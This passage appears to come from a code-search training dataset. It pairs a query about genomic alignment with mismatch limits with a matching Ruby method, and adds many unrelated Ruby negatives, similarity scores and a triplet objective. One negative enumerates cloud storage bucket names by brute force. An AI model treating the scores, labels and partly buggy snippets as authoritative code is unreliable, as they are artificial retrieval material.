Math::sqrt(@bb * @cc)) ** 2) / (@aa * @dd - @bb * @cc).abs\n @iter = 0\n begin\n #\n # IF RR EXCEEDS RCUT, GAUSSIAN QUADRATURE IS USED\n #\n #10\n if @rr>RCUT\n gaussian_quadrature\n return true\n end\n #\n # TETRACHORIC SERIES IS COMPUTED\n #\n # INITIALIZATION\n #\n va=1.0\n vb=@zac.to_f\n wa=1.0\n wb=@zab.to_f\n term = 1.0\n iterm = 0.0\n @sum = @probab * @probac\n deriv = 0.0\n sr = @ss\n #15\n begin\n if(sr.abs<=CONST)\n #\n # RESCALE TERMS TO AVOID OVERFLOWS AND UNDERFLOWS\n #\n sr = sr / CONST\n va = va * CHALF\n vb = vb * CHALF\n wa = wa * CHALF\n wb = wb * CHALF\n end\n #\n # FORM SUM AND DERIVATIVE OF SERIES\n #\n # 20\n dr = sr * va * wa\n sr = sr * @rr / term\n cof = sr * va * wa\n #\n # ITERM COUNTS NO. OF CONSECUTIVE TERMS < CONV\n #\n iterm+= 1\n iterm=0 if (cof.abs > CONV)\n @sum = @sum + cof\n deriv += dr\n vaa = va\n waa = wa\n va = vb\n wa = wb\n vb = @zac * va - term * vaa\n wb = @zab * wa - term * waa\n term += 1\n end while (iterm < 2 or term < 6)\n #\n # CHECK IF ITERATION CONVERGED\n #\n if((@sum-@probaa).abs <= CITER)\n @itype=term\n calculate_sdr\n return true\n end\n #\n # CALCULATE NEXT ESTIMATE OF CORRELATION\n #\n #25\n @iter += 1\n #\n # IF TOO MANY ITERATlONS, RUN IS TERMINATED\n #\n delta = (@sum - @probaa) / deriv\n @rrprev = @rr\n @rr = @rr - delta\n @rr += 0.5 * delta if(@iter == 1)\n @rr= RLIMIT if (@rr > RLIMIT)\n @rr =0 if (@rr < 0.0)\n end while @iter < NITER\n raise \"Too many iteration\"\n # GOTO 10\n end",
"def fit ind; ind.chromosome.inject(0,:+); end",
"def sortmerna(input_dir, samples_h)\n\n samples, labels = [], []\n rrna_5s_a, rrna_5_8s_a, rrna_18s_a, rrna_28s_a, rrna_all = [], [], [], [], []\n\n if File.exist?(\"#{input_dir}/#{samples_h.keys[0]}_aligned.log\")\n puts \"\\t\\tRun SortMeRna Statistics...\"\n\n samples_h.each do |sample, label|\n samples.push(sample)\n labels.push(label)\n read = false\n all = 0\n File.open(\"#{input_dir}/#{sample}_aligned.log\",'r').each do |line|\n read = true if line.include?('By database:')\n if read\n if line.include?('rfam-5s-database-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_5s_a.push(value)\n all += value\n end\n if line.include?('rfam-5.8s-database-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_5_8s_a.push(value)\n all += value\n end\n if line.include?('silva-euk-18s-id95.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_18s_a.push(value)\n all += value\n end\n if line.include?('silva-euk-28s-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_28s_a.push(value)\n all += value\n end\n end\n end\n rrna_all.push(all.round(2))\n end\n df = Nyaplot::DataFrame.new({:sample => samples, :label => labels, :rrna_5s => rrna_5s_a, :rrna_5_8s => rrna_5_8s_a, :rrna_18s => rrna_18s_a, :rrna_28s => rrna_28s_a, :all_rrna => rrna_all })\n df = Nyaplot::DataFrame.new({:label => %w(5s 5.8s 18s 28s all), :rrna => rrna_5s_a+rrna_5_8s_a+rrna_18s_a+rrna_28s_a+rrna_all })\n\n colors = Nyaplot::Colors.qual\n frame = Nyaplot::Frame.new\n\n #[:all_rrna, :rrna_5s, :rrna_5_8s, :rrna_18s, :rrna_28s].each do |rrna|\n plot = Nyaplot::Plot.new\n plot.configure do\n x_label('rRNA type')\n y_label(\"% rRNA\")\n yrange([0,100])\n legend(true)\n end\n #bar = plot.add_with_df(df, :bar, :label, rrna) # x-> column :label, y-> column :rrna\n bar = plot.add_with_df(df, :bar, :label, :rrna)\n bar.color(colors)\n frame.add(plot)\n\n frame.export_html(\"#{$out_dir}/sortmerna.html\")\n frame_html = File.open(\"#{$out_dir}/sortmerna.html\",'a')\n frame_html << \"\\n\\n<p>\\n#{df_to_html_table(df.to_html)}\\n</p>\\n\\n\"\n frame_html.close\n end\n end",
"def expected_score(r_A, r_B)\n 1 / (1 + 10**((r_B - r_A) / 400.0))\n end",
"def exec_seq(seq,blast_query)\n\n $LOG.debug \"[#{self.class.to_s}, seq: #{seq.seq_name}]: searching sequence repeated at input file\" \n\n fasta_input=@params.get_param('truncated_input_file')\n \n blast = BatchBlast.new(\"-db #{fasta_input}\" ,'blastn',\" -task blastn-short -searchsp #{SIZE_SEARCH_IN_IGNORE} -evalue #{@params.get_param('blast_evalue_ignore_repeated')} -perc_identity #{@params.get_param('blast_percent_ignore_repeated')}\") #get contaminants\n \n p_start = @params.get_param('piro_repeated_start').to_i\n p_length = @params.get_param('piro_repeated_length').to_i\n \n \n blast_table_results = blast.do_blast(seq.seq_fasta[p_start,p_length]) #rise seq to contaminants executing over blast\n \n #blast_table_results = BlastTableResult.new(res)\n \n \n type = \"ActionIgnoreRepeated\" \n \n # @stats[:rejected_seqs]={} \n \n actions=[] \n blast_table_results.querys.each do |query|\n \n # puts \"BLAST IGUALES:\"\n # puts res.join(\"\\n\") \n if query.size>1 \n names = query.hits.collect{ |h| \n if h.align_len > (p_length-2)\n h.subject_id\n end\n }\n \n names.compact! \n \n # puts \"IGUALES:\" + names.size.to_s \n # puts names.join(',') \n \n if !names.empty?\n names.sort!\n\t\t\t\t \n if (names[0] != seq.seq_name) # Add action when the sequence is repeated \n\t\t\t\t # if true \n\t\t\t\t a = seq.new_action(0,0,type)\n\t\t\t\t a.message = seq.seq_name + ' equal to ' + names[0] \n\t\t\t\t actions.push a\n\t\t\t\t seq.seq_rejected=true \n\t\t\t\t seq.seq_rejected_by_message='repeated'\n\t\t\t\t seq.seq_repeated=true \n\t\t\t\t \n # @stats[:rejected_seqs]={'rejected_seqs_by_repe' => 1} \n add_stats('rejected_seqs','rejected_seqs_by_repe') \n # puts \"#{names[0]} != #{seq.seq_name} >>>>>>\" \n\t\t\t\t end \n end\n \n end \n \n end \n \n seq.add_actions(actions)\n \n end",
"def process\n\n # process for all arities\n @combo_counts = Hash.new(0) #count of all pairings\n @cite_counts = Hash.new(0) #count of times each section is cited\n @total_population = 0\n @occurrence_counts = Array.new\n arity = 1\n while arity > 0\n arity = arity + 1\n @occurrence_counts[arity] = 0\n f = File.open(@fn, \"r\")\n f.each_line do |line|\n # clean up cruft\n # split and go\n # sorting is done to ensure that combination pairings are in same order throughout. This may not work.\n next if line =~ /^Section/\n line.chomp!.gsub!(/\"/, '')\n breakout = line.split(',')\n # turns out that sometimes there are duplicated entries\n breakout.sort!.uniq!\n @total_population = @total_population + 1\n breakout.each { |cite| @cite_counts[cite] = @cite_counts[cite] + 1 }\n combos = breakout.combination(arity).to_a\n if combos.length > 0\n @occurrence_counts[arity] = @occurrence_counts[arity] + 1\n combos.each do |combo|\n @combo_counts[combo] = @combo_counts[combo] + 1\n end\n end\n end\n f.close\n\n if @combo_counts.length < 1\n puts \"There are #{@total_population} violation events in the database.\"\n for n in 2..arity do\n pct = 100 * @occurrence_counts[n] / @total_population\n puts \"There are #{@occurrence_counts[n]} violation events that contain #{n}-way violations ( #{pct}% ) .\"\n end\n exit\n end\n # sort the hash by count\n @combo_counts = Hash[@combo_counts.sort_by { |key, value| value }.reverse]\n make_csv(arity)\n @combo_counts.clear\n @cite_counts.clear\n @combo_counts.default = 0\n @cite_counts.default = 0\n @total_population = 0\n end\n\n end",
"def update_alignment\n\n inital_params = {is_valid:0, step: step, km: km, kcal: kcal}\n new_align = segments.create_with(inital_params).find_or_create_by(is_valid: 0)\n\n total_valid = segments.select(\"sum(step) as step, sum(km) as km, sum(kcal) as kcal\").where(\"is_valid = 1\").first\n\n unless total_valid.step.nil?\n new_align.step = step - total_valid.step\n new_align.km = km - total_valid.km\n new_align.kcal = kcal - total_valid.kcal\n end\n\n new_align.save!(:validate => false)\n end",
"def calcAdjustment(matrix,totalGenes)\n #score adjustment for col/row sum\n colAdj = 0\n matrix.colSums.each{|sum|\n colAdj += Math.log2star(sum)\n }\n \n rowAdj = 0\n matrix.rowSums.each{|sum|\n rowAdj += Math.log2star(sum)\n }\n\n # each row gets sorted by its sum \n rowSortAdj = matrix.rowSums.calcUniqPermutationsLog2\n colSortAdj = matrix.colSums.calcUniqPermutationsLog2\n sortAdj = rowSortAdj + colSortAdj\n\n # score adjustment for which set of N genes to use \n # (think \"multiple testing\" via binomial coefficient)\n testAdj = Math.binomCoefficientLog2(totalGenes,matrix.numRows)\n\n return colAdj + rowAdj + testAdj +sortAdj\nend",
"def final_letter_grades(grade_hash)\n averages(grade_hash).transform_values{ |marks| letter_grade(marks)}\nend",
"def calc_transf_stats()\n \n #take the greatest of complete and partial transfers\n sql=<<-END\nselect un.gene_id,\n un.PROK_GROUP_SOURCE_ID,\n un.PROK_GROUP_DEST_ID,\n max(val) as val\nfrom\n(\nselect gene_id,\n PROK_GROUP_SOURCE_ID,\n PROK_GROUP_DEST_ID,\n VAL\nfrom HGT_COM_GENE_GROUPS_VALS\n union\nselect gene_id,\n PROK_GROUP_SOURCE_ID,\n PROK_GROUP_DEST_ID,\n VAL\nfrom HGT_PAR_GENE_GROUPS_VALS\n) un\ngroup by un.gene_id,\n un.PROK_GROUP_SOURCE_ID,\n un.PROK_GROUP_DEST_ID\norder by un.gene_id,\n un.PROK_GROUP_SOURCE_ID,\n un.PROK_GROUP_DEST_ID\n END\n @hpggv_hsh = @conn.select_rows(sql) \\\n .each_with_object({ }){ |c, hsh| hsh[[c[0].to_i,c[1].to_i,c[2].to_i]] = c[3].to_f }\n \n #puts \"@hpggv_hsh: #{@hpggv_hsh.inspect}\"\n #sleep 20\n \n @sg_hsh = arGeneGroupCnt.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[[c.gene_id,\n c.prok_group_id]\n ] = c.cnt }\n \n \n \n end",
"def calc_spread_to_benchmark(csv)\n file = prep_spread_data(csv)\n \n # print title\n print_spread('bond,benchmark,spread_to_benchmark')\n\n gov_lower = nil #hold government lower bound term\n corp_tmp = []\n file.each do |data|\n if data[1] == \"corporate\"\n corp_tmp.push data\n else # government entry\n if gov_lower.nil? and !corp_tmp.empty?\n # first entries are of type corporate (no lower bound)\n corp_tmp.each do |corp_data|\n print_spread(corp_data[0] << \",\" << data[0],\n (corp_data[3] - data[3]).abs)\n end\n else # given lower bound (gov_lower) and upper bound (data)\n corp_tmp.each do |corp_data|\n if((corp_data[2] - gov_lower[2]).abs < \n (corp_data[2] - data[2]).abs)\n # closest term is lower bound\n print_spread(corp_data[0] << \",\" << gov_lower[0],\n (corp_data[3] - gov_lower[3]).abs)\n else #closest term is upper bound\n print_spread(corp_data[0] << \",\" << data[0],\n (corp_data[3] - data[3]).abs)\n end\n end\n end\n corp_tmp = []\n gov_lower = data #update lower bound\n end\n end\n\n if !corp_tmp.empty?\n # there's corporate entries left, meaning there's no upperbound\n # use the last lower bound as closest\n corp_tmp.each do |corp_data|\n print_spread(corp_data[0] << \",\" << gov_lower[0],\n (corp_data[3] - gov_lower[3]).abs) \n end\n \n end\n\nend",
"def exec_seq(seq,blast_query)\n\n if ((self.class.to_s=='PluginLowQuality') && seq.seq_qual.nil? ) \n $LOG.debug \" Quality File haven't been provided. It's impossible to execute \" + self.class.to_s \n elsif ((seq.seq_qual.size>0) && (@params.get_param('use_qual').to_s=='true'))\n \n $LOG.debug \"[#{self.class.to_s}, seq: #{seq.seq_name}]: checking low quality of the sequence\"\n \n min_quality=@params.get_param('min_quality').to_i\n min_length_inside_seq=@params.get_param('min_length_inside_seq').to_i\n max_consecutive_good_bases=@params.get_param('max_consecutive_good_bases').to_i\n \n type='ActionLowQuality'\n actions=[]\n \n regions=get_low_qual_regions(seq.seq_qual,min_quality,min_length_inside_seq,max_consecutive_good_bases)\n \n regions.each do |r|\n low_qual_size=r.last-r.first+1\n \n # puts \"(#{low_qual_size}) = [#{r.first},#{r.last}]: #{a[r.first..r.last].map{|e| (\"%2d\" % e.to_s)}.join(' ')}\"\n \n \n add_stats('low_qual',low_qual_size)\n \n \n # create action\n a = seq.new_action(r.first,r.last,type) # adds the correspondent action to the sequence\n actions.push a\n \n \n \n end\n\n # add quals\n seq.add_actions(actions)\n end \n\n end",
"def expected_fractional_score(other)\n @e[other] ||= 1 / (1 + Math.exp(-other.gravity * (mean - other.mean)))\n end",
"def run\n super\n # create permutations\n additional_keywords = _get_option('additional_keywords').delete(' ').split(',')\n additional_keywords << _get_entity_name\n\n permutations = additional_keywords.map { |k| generate_permutations(k) } # generate permutations\n permutations << additional_keywords\n permutations.flatten!\n\n valid_buckets = bruteforce_buckets(permutations)\n _log \"Found #{valid_buckets.size} valid buckets.\"\n return if valid_buckets.empty?\n\n valid_buckets.each { |v| create_entity(v) }\n end",
"def averages(grade_hash)\n grade_hash\n .transform_values { |scores| scores.reduce(:+) / scores.length }\nend",
"def calc_transf_stats()\n \n @hpggv_hsh = arGeneGroupsVal.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[[c.gene_id,\n c.prok_group_source_id,\n c.prok_group_dest_id]\n ] = c.val }\n \n #puts \"@hpggv_hsh: #{@hpggv_hsh.inspect}\"\n #sleep 20\n \n @sg_hsh = arGeneGroupCnt.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[[c.gene_id,\n c.prok_group_id]\n ] = c.cnt }\n \n \n \n end",
"def create_Qreads_hist_data(qualities)\r\n hist = [0] * 50\r\n qualities.each do |qual|\r\n qual.each_char do |phred|\r\n q = convert_phred33_to_q(phred)\r\n hist[q] += 1\r\n end\r\n end\r\n return hist\r\nend"
] |
[
"0.6932818",
"0.62225187",
"0.59439397",
"0.56329626",
"0.56171745",
"0.56026036",
"0.5581892",
"0.5529177",
"0.54790694",
"0.54771227",
"0.53738934",
"0.53588796",
"0.5328883",
"0.53188115",
"0.52838665",
"0.5278783",
"0.5278012",
"0.52259076",
"0.5207305",
"0.51924706",
"0.5170211",
"0.5168706",
"0.51281065",
"0.50929785",
"0.50589436",
"0.5058168",
"0.5053032",
"0.5052412",
"0.5049633",
"0.5032585",
"0.50247765",
"0.50032103",
"0.49987283",
"0.49934545",
"0.4975765",
"0.49494272",
"0.49438688",
"0.49400035",
"0.4927066",
"0.49163276",
"0.48972258",
"0.48735103",
"0.48659632",
"0.48599046",
"0.4850532",
"0.48434642",
"0.48264444",
"0.48162138",
"0.481617",
"0.48043174",
"0.47862685",
"0.47836375",
"0.47760126",
"0.4760622",
"0.47351593",
"0.47201154",
"0.4714328",
"0.4710807",
"0.47097087",
"0.47082537",
"0.4700094",
"0.46933216",
"0.46862653",
"0.46726018",
"0.4671747",
"0.46693304",
"0.466925",
"0.46600696",
"0.46583202",
"0.46489093",
"0.46452165",
"0.4643779",
"0.46342266",
"0.46173754",
"0.46115202",
"0.46084154",
"0.45994085",
"0.45966983",
"0.45929834",
"0.45913526",
"0.45866597",
"0.45719215",
"0.4568302",
"0.45586434",
"0.45519564",
"0.45460498",
"0.45398197",
"0.45379084",
"0.4535207",
"0.45327243",
"0.45286644",
"0.45201182",
"0.4515215",
"0.45149496",
"0.45141006",
"0.45056856",
"0.4505525",
"0.44997737",
"0.44972426",
"0.4497135"
] |
0.74868
|
0
|
Performs genomic alignment with a fixed number of allowed mismatches
|
def unbucketized_alignment
  # Single-pass alignment of the full read set with one fixed mismatch budget
  # (in contrast to the bucketized variant, which varies mismatches per bucket).
  align(
    @ref, @ref_base, @software,
    { annotation: @annotation,
      tophat_aligner: @tophat_aligner,
      mismatches: @mismatches
    }
  )
  # STAR registers its mapped output under a different name in the registry.
  mapped_all = @software == :star ? \
    @names.get('mapped_all_star') : @names.get('mapped_all')
  run_cmd("cp #{mapped_all} #{@names.get('mapped_merged')}")
  # The unmapped-reads file is copied only for non-STAR aligners.
  unless @software == :star
    run_cmd(
      "cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}"
    )
  end
  # With no bucketing, every read was aligned under the same mismatch cap.
  @max_mismatches = @mismatches
end
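# --- usage sketch (illustrative addition, not from the original source) ---
# Assuming a hypothetical pipeline object that has already set @ref,
# @ref_base, @software and @mismatches and populated the @names registry:
#
#   pipeline.unbucketized_alignment
#   # => 'mapped_merged' (and, for non-STAR aligners, 'unmapped_merged')
#   #    now hold the single-pass results; @max_mismatches == @mismatches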
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def align_sequences_nm(sequence1, sequence2, scores)\n # Dynamic programming.\n dp = Array.new(sequence1.length + 1) { Array.new(sequence2.length + 1) }\n gap_score = scores['-']['-']\n dp[0][0] = [0, 0, 0, '|', '|']\n sequence1.chars.each_with_index do |c, i|\n dp[i + 1][0] = [(i + 1) * gap_score, 1, 0, c, '-']\n end\n sequence2.chars.each_with_index do |c, j|\n dp[0][j + 1] = [(j + 1) * gap_score, 0, 1, '-', c]\n end\n sequence1.chars.each_with_index do |base1, i|\n sequence2.chars.each_with_index do |base2, j|\n dp[i + 1][j + 1] = [[0, 1, '-', base2], [1, 0, '-', base1],\n [1, 1, base1, base2]].map { |i1, j1, match1, match2|\n [dp[i - i1 + 1][j - j1 + 1].first + scores[match1][match2],\n i1, j1, match1, match2]\n }.max\n end\n end\n \n # Solution reconstruction.\n i, j = *[sequence1, sequence2].map(&:length)\n match_score = dp[i][j].first\n align1, align2 = '', ''\n until i == 0 && j == 0\n score, i1, j1, base1, base2 = *dp[i][j]\n align1 << base1; i -= i1 \n align2 << base2; j -= j1\n end\n \n # Return values\n scores = dp.map { |line| line.map(&:first) }\n words = { [1, 0] => '$\\\\uparrow$', [0, 1] => '$\\\\leftarrow$',\n [1, 1] => '$\\\\nwarrow$', [0, 0] => '$\\\\cdot$'}\n parents = dp.map { |line| line.map { |item| words[item[1, 2]] } }\n { :scores => scores, :parents => parents, :match_score => match_score,\n :aligns => [align1, align2].map(&:reverse) }\nend",
"def align\n i = @max_cell_row\n j = @max_cell_column\n @first_result = \"\" \n @second_result = \"\" \n gaps_in_first = 0 # count of gaps in each sequence\n gaps_in_second = 0\n\n while true\n\n # end local alignment at 0 cell\n if @traceback_matrix[i, j] == 0\n break\n end\n\n # match/mismatch\n if @traceback_matrix[i, j] == 1\n @first_result << @first_string[i-1]\n @second_result << @second_string[j-1]\n i -= 1\n j -= 1\n end\n\n # deletion -> gap in S1\n if @traceback_matrix[i, j] == 2\n @first_result << \"-\"\n @second_result << @second_string[j-1]\n j -= 1\n gaps_in_first += 1\n end\n\n # insertion -> gap in S2\n if @traceback_matrix[i, j] == 3\n @first_result << @first_string[i-1]\n @second_result << \"-\"\n i -= 1\n gaps_in_second += 1\n end\n\n end\n # set variables to make writing to file prettier\n set_variables(gaps_in_first, gaps_in_second)\n end",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def test_alignment_works_in_single_thread\n assert_nothing_raised(\"Can't handle single threaded scenario\") do\n SEQUENCE_GROUPS[0..10].each do |sequence_group|\n align_group(sequence_group)\n end\n end\n end",
"def merge_pairwise(aligns)\n ps = aligns.map do |align| \n seqs = []\n align.each do |bioseq|\n seqs << bioseq.to_s\n end\n seqs\n end\n template = []\n #m,x,n\n x = 2\n ftemp = ps.first.first\n nmax = ps.map {|pair| pair.first.size }.max\n mmax = ps.size\n mar = (0...mmax).to_a\n others = mar.map { [] }\n ns = mar.map { 0 }\n tn = 0\n on = 0\n (0...nmax).each do |n|\n (t_dsh, t_no_dsh) = mar.partition do |m| \n # this is RUBY 1.8 ONLY!!\n ps[m][0][ns[m]] == 45 # '-' is ascii 45\n end\n\n # if a template has a dash, all other off-templates need a dash\n if t_dsh.size > 0\n template[tn] = 45\n t_no_dsh.each do |m|\n # don't update these guys counter\n others[m][tn] = 45\n end\n t_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n ns[m] += 1\n end\n else # no dashes in the template\n t_no_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n end\n template[tn] = ps[0][0][ns[0]]\n ns.map!{|v| v+1 } \n end\n tn += 1\n end\n [cs_to_s(template), others.map! {|ar| cs_to_s(ar) } ]\n end",
"def align\n [:owner, :group, :size].each do |field|\n current = @alignment[field]\n @buffer.each do |line|\n new = line[field].length\n current = new if current < new\n end\n @alignment[field] = current\n end\n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def align_all_words\n 0.upto(word_list.length-1) do |i|\n 0.upto(i-1) do |j|\n w1 = self[i]\n w2 = self[j]\n if (w1.meaning & w2.meaning).empty?\n LOGGER.debug(\"Skipping alignment for\\n\" +\n \"#{w1}\\n#{w2}\\nbecause they share no meaning\")\n next\n end\n @alignment_table.add(Alignment.new(w1, w2), i, j)\n end\n end\n end",
"def check_matchness(aa_sequence_hash,nt_sequence_hash)\n missing_nt_sequence = Array.new\n aa_sequence_hash.each do |defi, seq|\n if nt_sequence_hash[defi].nil? \n # miss that stuff\n missing_nt_sequence << defi\n end\n end\n\n missing_aa_sequence = Array.new\n nt_sequence_hash.each do |defi, seq|\n if aa_sequence_hash[defi].nil?\n missing_aa_sequence << defi\n end\n end\n\n\n return missing_aa_sequence, missing_nt_sequence\n end",
"def fix_gags(hash_of_sequence_ids_to_sequence_strings, sequence_id_to_gags={})\n log = Bio::Log::LoggerPlus['bio-gag']\n \n # Get the gags\n if sequence_id_to_gags == {}\n log.info \"Predicting gags from the pileup\"\n gags do |gag|\n sequence_id_to_gags[gag.ref_name] ||= []\n sequence_id_to_gags[gag.ref_name].push gag\n end\n else\n log.info \"Using pre-specified GAG errors\"\n end\n log.info \"Found #{sequence_id_to_gags.values.flatten.length} gag errors to fix\"\n \n # Make sure all gag errors in the pileup map to a sequence input fasta file by keeping tally\n accounted_for_seq_ids = []\n fixed_sequences = {} #Hash of sequence ids to sequences without gag errors\n hash_of_sequence_ids_to_sequence_strings.each do |seq_id, seq|\n log.debug \"Now attempting to fix sequence #{seq_id}, sequence #{seq}\"\n toilet = sequence_id_to_gags[seq_id]\n if toilet.nil?\n # No gag errors found in this sequence (or pessimistically the sequence wasn't in the pileup -leaving that issue to the user though)\n fixed_sequences[seq_id] = seq\n else\n # Gag error found at least once somewhere in this sequence\n # Record that this was touched in the pileup\n accounted_for_seq_ids.push seq_id\n \n # Output the fixed-up sequence\n last_gag = 0\n fixed = ''\n toilet.sort{|a,b| a.position<=>b.position}.each do |gag|\n #log.debug \"Attempting to fix gag at position #{gag.position} in sequence #{seq_id}, which is #{seq.length} bases long\"\n fixed = fixed+seq[last_gag..(gag.position-1)]\n fixed = fixed+seq[(gag.position-1)..(gag.position-1)]\n last_gag = gag.position\n #log.debug \"After fixing gag at position #{gag.position}, fixed sequence is now #{fixed}\"\n end\n fixed = fixed+seq[last_gag..(seq.length-1)]\n fixed_sequences[seq_id] = fixed\n end\n end\n \n unless accounted_for_seq_ids.length == sequence_id_to_gags.length\n log.warn \"Unexpectedly found GAG errors in sequences that weren't in the sequence that are to be fixed: 